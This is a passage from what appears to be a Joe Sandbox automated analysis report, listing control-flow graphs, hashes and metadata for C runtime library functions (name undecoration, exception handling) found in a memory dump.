7ff8ba2485fc 1278->1294 1280->1223 1304 7ff8ba24d765-7ff8ba24d768 1288->1304 1288->1305 1289->1269 1342 7ff8ba24d78e-7ff8ba24d792 1289->1342 1290->1273 1291->1274 1320 7ff8ba24d93e-7ff8ba24d94c call 7ff8ba246e9c 1291->1320 1294->1223 1314 7ff8ba24d726-7ff8ba24d738 call 7ff8ba24b1cc 1300->1314 1315 7ff8ba24d711-7ff8ba24d724 call 7ff8ba2485ac 1300->1315 1304->1269 1318 7ff8ba24d76a-7ff8ba24d76d 1304->1318 1329 7ff8ba24d84c-7ff8ba24d85b call 7ff8ba247480 1305->1329 1309->1223 1348 7ff8ba24d73a-7ff8ba24d741 1314->1348 1349 7ff8ba24d743 1314->1349 1315->1251 1318->1289 1318->1329 1320->1223 1329->1223 1347 7ff8ba24d9df-7ff8ba24d9e6 1335->1347 1336->1335 1344 7ff8ba24d986-7ff8ba24d989 1336->1344 1345 7ff8ba24d80b-7ff8ba24d81d call 7ff8ba24b1cc 1338->1345 1346 7ff8ba24d7f6-7ff8ba24d809 call 7ff8ba2485ac 1338->1346 1351 7ff8ba24d7a9-7ff8ba24d7bb call 7ff8ba24b1cc 1342->1351 1352 7ff8ba24d794-7ff8ba24d7a7 call 7ff8ba2485ac 1342->1352 1353 7ff8ba24d9d8 1344->1353 1354 7ff8ba24d98b-7ff8ba24d98e 1344->1354 1369 7ff8ba24d81f-7ff8ba24d826 1345->1369 1370 7ff8ba24d828 1345->1370 1346->1305 1355 7ff8ba24d9a2-7ff8ba24d9cf call 7ff8ba2471a4 call 7ff8ba247454 1347->1355 1357 7ff8ba24d746-7ff8ba24d74d call 7ff8ba246f50 1348->1357 1349->1357 1371 7ff8ba24d7bd-7ff8ba24d7c4 1351->1371 1372 7ff8ba24d7c6 1351->1372 1352->1269 1353->1347 1354->1207 1361 7ff8ba24d994-7ff8ba24d99b 1354->1361 1355->1353 1357->1251 1361->1355 1374 7ff8ba24d82b-7ff8ba24d832 call 7ff8ba246f50 1369->1374 1370->1374 1375 7ff8ba24d7c9-7ff8ba24d7d0 call 7ff8ba246f50 1371->1375 1372->1375 1374->1305 1375->1269
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: NameName::Name::operator+$atolswprintf_s
                                                                                                                                                            • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                            • API String ID: 1620834350-2441609178
                                                                                                                                                            • Opcode ID: 978e69f52fd8b525ec1dc55fc4fa8de3ff02ea3cd31bc90fc3d22f7cc102acd3
                                                                                                                                                            • Instruction ID: 4f971e481d8884696b69c3155d948e114875514c02770879156089d279b6bc61
                                                                                                                                                            • Opcode Fuzzy Hash: 978e69f52fd8b525ec1dc55fc4fa8de3ff02ea3cd31bc90fc3d22f7cc102acd3
                                                                                                                                                            • Instruction Fuzzy Hash: 10F16972E1864384FF14AB6CDAA51BC27A0BF45FC4F4501B6CF0E26AA9DE3DA545E340
                                                                                                                                                            Function 00007FF8BA24AB04 Relevance: 22.9, APIs: 15, Instructions: 357COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1379 7ff8ba24ab04-7ff8ba24ab3a 1380 7ff8ba24ab3c-7ff8ba24ab5a call 7ff8ba247454 1379->1380 1381 7ff8ba24ab5f-7ff8ba24ab65 1379->1381 1389 7ff8ba24b006-7ff8ba24b029 1380->1389 1383 7ff8ba24ab67-7ff8ba24ab6a 1381->1383 1384 7ff8ba24ab70-7ff8ba24ab83 1381->1384 1383->1384 1386 7ff8ba24affb-7ff8ba24afff 1383->1386 1387 7ff8ba24ab85-7ff8ba24ab88 1384->1387 1388 7ff8ba24aba7-7ff8ba24abaa 1384->1388 1390 7ff8ba24b003 1386->1390 1387->1380 1391 7ff8ba24ab8a-7ff8ba24aba0 1387->1391 1388->1386 1392 7ff8ba24abb0-7ff8ba24abb3 1388->1392 1390->1389 1391->1392 1393 7ff8ba24aba2-7ff8ba24aba5 1391->1393 1392->1386 1394 7ff8ba24abb9-7ff8ba24abd5 1392->1394 1393->1392 1395 7ff8ba24ad2a-7ff8ba24ad34 1394->1395 1396 7ff8ba24abdb-7ff8ba24abe5 1394->1396 1397 7ff8ba24ad3a-7ff8ba24ad4a 1395->1397 1398 7ff8ba24adf7 1395->1398 1399 7ff8ba24acb9-7ff8ba24acbc 1396->1399 1400 7ff8ba24abeb-7ff8ba24ac3b call 7ff8ba2471a4 call 7ff8ba247454 1396->1400 1402 7ff8ba24add9-7ff8ba24ade3 call 7ff8ba248d2c 1397->1402 1403 7ff8ba24ad50-7ff8ba24ad96 call 7ff8ba248d2c call 7ff8ba2485ac call 7ff8ba247454 * 2 1397->1403 1405 7ff8ba24adfb-7ff8ba24ae0b 1398->1405 1401 7ff8ba24acc3-7ff8ba24acc7 1399->1401 1426 7ff8ba24ac3d-7ff8ba24ac87 call 7ff8ba24c69c call 7ff8ba2485ac call 7ff8ba247454 * 2 1400->1426 1427 7ff8ba24ac89-7ff8ba24aca9 call 7ff8ba247454 1400->1427 1408 7ff8ba24accd-7ff8ba24accf 1401->1408 1409 7ff8ba24adc4-7ff8ba24add0 1401->1409 1402->1405 1424 7ff8ba24ade5-7ff8ba24ade9 1402->1424 1443 7ff8ba24adf4 1403->1443 1406 7ff8ba24ae0d-7ff8ba24ae2f call 7ff8ba249424 call 7ff8ba247454 1405->1406 1407 7ff8ba24ae31-7ff8ba24ae3a call 7ff8ba249424 1405->1407 1432 7ff8ba24ae4e-7ff8ba24ae51 1406->1432 1431 7ff8ba24ae3c-7ff8ba24ae40 1407->1431 1407->1432 1408->1386 1415 7ff8ba24acd5-7ff8ba24acfd 1408->1415 1409->1402 1421 7ff8ba24ad98-7ff8ba24adb5 call 7ff8ba249570 1415->1421 1422 7ff8ba24ad03-7ff8ba24ad24 call 7ff8ba249570 1415->1422 1421->1395 1447 7ff8ba24adbb-7ff8ba24adbf 1421->1447 1448 7ff8ba24ad27 1422->1448 1424->1405 1433 7ff8ba24adeb-7ff8ba24adf2 1424->1433 1456 7ff8ba24acad-7ff8ba24acb7 1426->1456 1427->1456 1431->1432 1439 7ff8ba24ae42-7ff8ba24ae4b 1431->1439 1440 7ff8ba24ae94-7ff8ba24aeab call 7ff8ba24b1cc 1432->1440 1441 7ff8ba24ae53-7ff8ba24ae91 call 7ff8ba2485ac call 7ff8ba247454 call 7ff8ba247480 1432->1441 1433->1443 1439->1432 1458 7ff8ba24aead-7ff8ba24aeb4 1440->1458 1459 7ff8ba24aeb6 1440->1459 1441->1440 1443->1398 1447->1448 1448->1395 1456->1401 1462 7ff8ba24aeb9-7ff8ba24af1d call 7ff8ba24c668 call 7ff8ba248840 call 7ff8ba2485ac call 7ff8ba247454 call 7ff8ba247480 call 7ff8ba247558 1458->1462 1459->1462 1482 7ff8ba24af1f-7ff8ba24af22 1462->1482 1483 7ff8ba24af37-7ff8ba24af43 1462->1483 1482->1483 1484 7ff8ba24af24-7ff8ba24af31 call 7ff8ba247558 1482->1484 1485 7ff8ba24af58-7ff8ba24af61 call 7ff8ba24c48c 1483->1485 1486 7ff8ba24af45-7ff8ba24af56 call 7ff8ba24c48c call 7ff8ba247558 1483->1486 1484->1483 1493 7ff8ba24af78-7ff8ba24af9e call 7ff8ba24b25c call 7ff8ba247558 1485->1493 1494 7ff8ba24af63-7ff8ba24af67 1485->1494 1486->1493 1502 7ff8ba24afa0-7ff8ba24afac call 7ff8ba24db60 call 7ff8ba247558 1493->1502 1503 7ff8ba24afd2-7ff8ba24afdb call 7ff8ba24db60 1493->1503 1494->1493 1496 7ff8ba24af69-7ff8ba24af75 1494->1496 1496->1493 1509 7ff8ba24afb1 1502->1509 1508 7ff8ba24afdd-7ff8ba24afe1 1503->1508 1503->1509 1508->1509 1511 7ff8ba24afe3-7ff8ba24afef 1508->1511 1512 7ff8ba24afb4-7ff8ba24afb7 1509->1512 1511->1512 1513 7ff8ba24afb9-7ff8ba24afd0 1512->1513 1514 7ff8ba24aff1-7ff8ba24aff9 1512->1514 1513->1389 1514->1390
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                            • Opcode ID: 597465e820db99d0557f48292ed4c843d9516f5f232f55aca89ea12ae8ab2ee3
                                                                                                                                                            • Instruction ID: fa70cd1b32c7d1002c80036379f3334edc83326b4d105394e50b9c566165f011
                                                                                                                                                            • Opcode Fuzzy Hash: 597465e820db99d0557f48292ed4c843d9516f5f232f55aca89ea12ae8ab2ee3
                                                                                                                                                            • Instruction Fuzzy Hash: 43F15876E08A829AF710DF69D4901FC37B1BB04B8CB4440B6EF4D57A9ADE38E559E340
                                                                                                                                                            Function 00007FF8BA242EF4 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1515 7ff8ba242ef4-7ff8ba242f5c call 7ff8ba245250 1518 7ff8ba242f62-7ff8ba242f65 1515->1518 1519 7ff8ba243374-7ff8ba24337a abort 1515->1519 1518->1519 1520 7ff8ba242f6b-7ff8ba242f71 1518->1520 1521 7ff8ba24337b-7ff8ba24339a call 7ff8ba2501a0 1519->1521 1522 7ff8ba243042-7ff8ba243054 1520->1522 1523 7ff8ba242f77-7ff8ba242f7b 1520->1523 1525 7ff8ba24305a-7ff8ba24305e 1522->1525 1526 7ff8ba24332f-7ff8ba243333 1522->1526 1523->1522 1527 7ff8ba242f81-7ff8ba242f8c 1523->1527 1525->1526 1531 7ff8ba243064-7ff8ba24306f 1525->1531 1529 7ff8ba243368-7ff8ba243372 call 7ff8ba246960 1526->1529 1530 7ff8ba243335-7ff8ba24333c 1526->1530 1527->1522 1532 7ff8ba242f92-7ff8ba242f97 1527->1532 1529->1519 1529->1521 1530->1519 1533 7ff8ba24333e-7ff8ba243363 call 7ff8ba2438b0 1530->1533 1531->1526 1535 7ff8ba243075-7ff8ba24307c 1531->1535 1532->1522 1536 7ff8ba242f9d-7ff8ba242fa7 call 7ff8ba246960 1532->1536 1533->1529 1539 7ff8ba243082-7ff8ba2430b9 call 7ff8ba24f504 1535->1539 1540 7ff8ba243246-7ff8ba243252 1535->1540 1536->1521 1548 7ff8ba242fad-7ff8ba242fd8 call 7ff8ba246960 * 2 call 7ff8ba24fc74 1536->1548 1539->1540 1551 7ff8ba2430bf-7ff8ba2430c7 1539->1551 1540->1529 1542 7ff8ba243258-7ff8ba24325c 1540->1542 1545 7ff8ba24325e-7ff8ba24326a call 7ff8ba24fc34 1542->1545 1546 7ff8ba24326c-7ff8ba243274 1542->1546 1545->1546 1560 7ff8ba24328d-7ff8ba243295 1545->1560 1546->1529 1550 7ff8ba24327a-7ff8ba243287 call 7ff8ba24f348 1546->1550 1580 7ff8ba242fda-7ff8ba242fde 1548->1580 1581 7ff8ba242ff8-7ff8ba243002 call 7ff8ba246960 1548->1581 1550->1529 1550->1560 1556 7ff8ba2430cb-7ff8ba2430fd 1551->1556 1557 7ff8ba243239-7ff8ba243240 1556->1557 1558 7ff8ba243103-7ff8ba24310e 1556->1558 1557->1540 1557->1556 1558->1557 1562 7ff8ba243114-7ff8ba24312d 1558->1562 1563 7ff8ba243297-7ff8ba2432b4 call 7ff8ba246960 * 2 terminate 1560->1563 1564 7ff8ba2432b5-7ff8ba2432b9 1560->1564 1566 7ff8ba243133-7ff8ba243178 call 7ff8ba24fc48 * 2 1562->1566 1567 7ff8ba243226-7ff8ba24322b 1562->1567 1563->1564 1570 7ff8ba2432bb-7ff8ba2432ca call 7ff8ba24fc34 1564->1570 1571 7ff8ba2432cc 1564->1571 1593 7ff8ba24317a-7ff8ba2431a0 call 7ff8ba24fc48 call 7ff8ba243dbc 1566->1593 1594 7ff8ba2431b6-7ff8ba2431bc 1566->1594 1573 7ff8ba243236 1567->1573 1577 7ff8ba2432cf-7ff8ba2432d9 call 7ff8ba2452e8 1570->1577 1571->1577 1573->1557 1577->1529 1592 7ff8ba2432df-7ff8ba24332d call 7ff8ba24f414 call 7ff8ba24f7b0 1577->1592 1580->1581 1586 7ff8ba242fe0-7ff8ba242feb 1580->1586 1581->1522 1595 7ff8ba243004-7ff8ba243024 call 7ff8ba246960 * 2 call 7ff8ba2452e8 1581->1595 1586->1581 1590 7ff8ba242fed-7ff8ba242ff2 1586->1590 1590->1519 1590->1581 1592->1529 1612 7ff8ba2431a2-7ff8ba2431b4 1593->1612 1613 7ff8ba2431c7-7ff8ba243224 call 7ff8ba242d4c 1593->1613 1600 7ff8ba2431be-7ff8ba2431c2 1594->1600 1601 7ff8ba24322d 1594->1601 1617 7ff8ba24303d 1595->1617 1618 7ff8ba243026-7ff8ba243030 call 7ff8ba2453d8 1595->1618 1600->1566 1603 7ff8ba243232 1601->1603 1603->1573 1612->1593 1612->1594 1613->1603 1617->1522 1621 7ff8ba24339b-7ff8ba2433bf call 7ff8ba242520 call 7ff8ba244684 call 7ff8ba246630 1618->1621 1622 7ff8ba243036-7ff8ba24303c terminate 1618->1622 1622->1617
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 4223619315-393685449
                                                                                                                                                            • Opcode ID: 0dd560a2d9878c2caa53d7c48a3ed421d9e0544cc688ae93cdb3f87085547c5f
                                                                                                                                                            • Instruction ID: c1bb57526880a488f773ce680cccf01ecb56fef61922ca5beecb05831e8e7c53
                                                                                                                                                            • Opcode Fuzzy Hash: 0dd560a2d9878c2caa53d7c48a3ed421d9e0544cc688ae93cdb3f87085547c5f
                                                                                                                                                            • Instruction Fuzzy Hash: B8E16D72A08B828AEB20DB69D5802AD7BA4FB45FD8F105175EF8D57B95CF38E580D700
                                                                                                                                                            Function 00007FF8BA24E600 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1629 7ff8ba24e600-7ff8ba24e644 1630 7ff8ba24e664-7ff8ba24e668 1629->1630 1631 7ff8ba24e646-7ff8ba24e65f call 7ff8ba2473e8 1629->1631 1633 7ff8ba24e66a-7ff8ba24e698 call 7ff8ba24d20c 1630->1633 1634 7ff8ba24e6c7-7ff8ba24e6d7 1630->1634 1640 7ff8ba24e8b9-7ff8ba24e8df call 7ff8ba2501a0 1631->1640 1646 7ff8ba24e69e-7ff8ba24e6c2 call 7ff8ba2473b8 1633->1646 1647 7ff8ba24e873-7ff8ba24e876 1633->1647 1635 7ff8ba24e6db-7ff8ba24e6df 1634->1635 1638 7ff8ba24e6f0-7ff8ba24e6f8 1635->1638 1639 7ff8ba24e6e1-7ff8ba24e6e3 1635->1639 1643 7ff8ba24e70e-7ff8ba24e718 1638->1643 1644 7ff8ba24e6fa-7ff8ba24e70c 1638->1644 1639->1638 1642 7ff8ba24e6e5-7ff8ba24e6ee 1639->1642 1642->1635 1642->1638 1649 7ff8ba24e71e-7ff8ba24e722 1643->1649 1648 7ff8ba24e753-7ff8ba24e77a call 7ff8ba24cc98 1644->1648 1646->1647 1652 7ff8ba24e878-7ff8ba24e882 1647->1652 1653 7ff8ba24e8b2-7ff8ba24e8b5 1647->1653 1664 7ff8ba24e81c-7ff8ba24e83d call 7ff8ba2471a4 call 7ff8ba247454 1648->1664 1665 7ff8ba24e780-7ff8ba24e78a 1648->1665 1656 7ff8ba24e724-7ff8ba24e726 1649->1656 1657 7ff8ba24e733-7ff8ba24e73b 1649->1657 1652->1653 1655 7ff8ba24e884-7ff8ba24e887 1652->1655 1653->1640 1655->1653 1659 7ff8ba24e889-7ff8ba24e89d call 7ff8ba24b1cc 1655->1659 1656->1657 1660 7ff8ba24e728-7ff8ba24e731 1656->1660 1661 7ff8ba24e83f-7ff8ba24e842 1657->1661 1662 7ff8ba24e741-7ff8ba24e74f 1657->1662 1659->1653 1676 7ff8ba24e89f-7ff8ba24e8ad 1659->1676 1660->1649 1660->1657 1667 7ff8ba24e85a-7ff8ba24e868 call 7ff8ba2470f4 1661->1667 1668 7ff8ba24e844-7ff8ba24e848 1661->1668 1662->1648 1685 7ff8ba24e80e-7ff8ba24e81a call 7ff8ba247480 1664->1685 1665->1664 1669 7ff8ba24e790-7ff8ba24e79e 1665->1669 1678 7ff8ba24e86d-7ff8ba24e870 1667->1678 1668->1667 1672 7ff8ba24e84a-7ff8ba24e858 1668->1672 1674 7ff8ba24e7bf-7ff8ba24e7d7 atol 1669->1674 1675 7ff8ba24e7a0-7ff8ba24e7b8 1669->1675 1672->1647 1683 7ff8ba24e7ed-7ff8ba24e80a call 7ff8ba2471a4 call 7ff8ba247454 1674->1683 1684 7ff8ba24e7d9-7ff8ba24e7e8 call 7ff8ba246e9c 1674->1684 1675->1674 1676->1653 1678->1647 1683->1685 1684->1678 1685->1678
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Replicator::operator[]
                                                                                                                                                            • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                            • API String ID: 3676697650-3207858774
                                                                                                                                                            • Opcode ID: 3addcfa3c2c44c7a3f9a88e2e8e586db211cac7a5ef4b6226af3b5348051e299
                                                                                                                                                            • Instruction ID: 055b460e7fcd57165c312d93f5452710bc8bcb2b7c02a7eef89cd34b71722e5d
                                                                                                                                                            • Opcode Fuzzy Hash: 3addcfa3c2c44c7a3f9a88e2e8e586db211cac7a5ef4b6226af3b5348051e299
                                                                                                                                                            • Instruction Fuzzy Hash: 06916932A18A8799FB109F28D4502F837A1BB54B88F4841B2EF4D037A5DF3DE645E740
                                                                                                                                                            Function 00007FF8BA24A3CC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                            • API String ID: 2943138195-1464470183
                                                                                                                                                            • Opcode ID: 0685ddb5f94d40678beb19f80be6ba5b9ae8127527adf2a293c082c5157d57b7
                                                                                                                                                            • Instruction ID: b3196f2f8ef958cb099c94a9507f016fe4ae133359d3a78404b22601403057ba
                                                                                                                                                            • Opcode Fuzzy Hash: 0685ddb5f94d40678beb19f80be6ba5b9ae8127527adf2a293c082c5157d57b7
                                                                                                                                                            • Instruction Fuzzy Hash: 5C513872F18A5299FB14CBA9E9445BC27B0BB04BC8F5001B9EF0D66A98DF39E545E700
                                                                                                                                                            Function 00007FF8BA248AE4 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                            • Opcode ID: 5abc505851f038650be8a12eed447ae112168e61361c1100e042e09226019bff
                                                                                                                                                            • Instruction ID: c2a8c7a01db958e025023d2f66261c556ef82050e2dfa32ea2979bcb67e904f5
                                                                                                                                                            • Opcode Fuzzy Hash: 5abc505851f038650be8a12eed447ae112168e61361c1100e042e09226019bff
                                                                                                                                                            • Instruction Fuzzy Hash: 19614A62F24B6698FB00DBA8D8801EC37B2BB44B88F404476DF1D6BA99DF78D549D340
                                                                                                                                                            Function 00007FF8BA2433C0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1793 7ff8ba2433c0-7ff8ba243423 call 7ff8ba24edc0 1796 7ff8ba24343c-7ff8ba243445 call 7ff8ba246960 1793->1796 1797 7ff8ba243425-7ff8ba24342e call 7ff8ba246960 1793->1797 1802 7ff8ba24345b-7ff8ba24345e 1796->1802 1803 7ff8ba243447-7ff8ba243454 call 7ff8ba246960 * 2 1796->1803 1804 7ff8ba243864-7ff8ba24386a abort 1797->1804 1805 7ff8ba243434-7ff8ba24343a 1797->1805 1802->1804 1807 7ff8ba243464-7ff8ba243470 1802->1807 1803->1802 1808 7ff8ba24386b-7ff8ba24388a call 7ff8ba2501a0 1804->1808 1805->1802 1810 7ff8ba24349b 1807->1810 1811 7ff8ba243472-7ff8ba243499 1807->1811 1815 7ff8ba24349d-7ff8ba24349f 1810->1815 1811->1815 1815->1804 1817 7ff8ba2434a5-7ff8ba2434ab 1815->1817 1818 7ff8ba2434b1-7ff8ba2434b5 1817->1818 1819 7ff8ba243577-7ff8ba24358d call 7ff8ba244570 1817->1819 1818->1819 1821 7ff8ba2434bb-7ff8ba2434c6 1818->1821 1824 7ff8ba243593-7ff8ba243597 1819->1824 1825 7ff8ba243820-7ff8ba243824 1819->1825 1821->1819 1823 7ff8ba2434cc-7ff8ba2434d1 1821->1823 1823->1819 1826 7ff8ba2434d7-7ff8ba2434e1 call 7ff8ba246960 1823->1826 1824->1825 1829 7ff8ba24359d-7ff8ba2435a8 1824->1829 1827 7ff8ba243858-7ff8ba243862 call 7ff8ba246960 1825->1827 1828 7ff8ba243826-7ff8ba24382d 1825->1828 1826->1808 1837 7ff8ba2434e7-7ff8ba24350d call 7ff8ba246960 * 2 call 7ff8ba24fc74 1826->1837 1827->1804 1827->1808 1828->1804 1832 7ff8ba24382f-7ff8ba243853 call 7ff8ba243acc 1828->1832 1829->1825 1834 7ff8ba2435ae-7ff8ba2435b2 1829->1834 1832->1827 1835 7ff8ba2435b8-7ff8ba2435ef call 7ff8ba24f644 1834->1835 1836 7ff8ba2437f2-7ff8ba2437f6 1834->1836 1835->1836 1847 7ff8ba2435f5-7ff8ba243600 1835->1847 1836->1827 1842 7ff8ba2437f8-7ff8ba243805 call 7ff8ba24f374 1836->1842 1861 7ff8ba24350f-7ff8ba243513 1837->1861 1862 7ff8ba24352d-7ff8ba243537 call 7ff8ba246960 1837->1862 1842->1827 1849 7ff8ba243807-7ff8ba24381f call 7ff8ba246960 * 2 terminate 1842->1849 1850 7ff8ba243604-7ff8ba243614 1847->1850 1849->1825 1853 7ff8ba24361a-7ff8ba243620 1850->1853 1854 7ff8ba24374d-7ff8ba2437ec 1850->1854 1853->1854 1857 7ff8ba243626-7ff8ba24364f call 7ff8ba2444f4 1853->1857 1854->1836 1854->1850 1857->1854 1867 7ff8ba243655-7ff8ba24369c call 7ff8ba24fc48 * 2 1857->1867 1861->1862 1865 7ff8ba243515-7ff8ba243520 1861->1865 1862->1819 1871 7ff8ba243539-7ff8ba243559 call 7ff8ba246960 * 2 call 7ff8ba2452e8 1862->1871 1865->1862 1868 7ff8ba243522-7ff8ba243527 1865->1868 1879 7ff8ba2436d8-7ff8ba2436ee call 7ff8ba244b80 1867->1879 1880 7ff8ba24369e-7ff8ba2436c3 call 7ff8ba24fc48 call 7ff8ba243efc 1867->1880 1868->1804 1868->1862 1888 7ff8ba24355b-7ff8ba243565 call 7ff8ba2453d8 1871->1888 1889 7ff8ba243572 1871->1889 1890 7ff8ba243749 1879->1890 1891 7ff8ba2436f0 1879->1891 1894 7ff8ba2436f5-7ff8ba243744 call 7ff8ba242e20 1880->1894 1895 7ff8ba2436c5-7ff8ba2436d1 1880->1895 1898 7ff8ba24388b-7ff8ba2438af call 7ff8ba242520 call 7ff8ba244684 call 7ff8ba246630 1888->1898 1899 7ff8ba24356b-7ff8ba243571 terminate 1888->1899 1889->1819 1890->1854 1891->1867 1894->1890 1895->1880 1897 7ff8ba2436d3 1895->1897 1897->1879 1899->1889
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
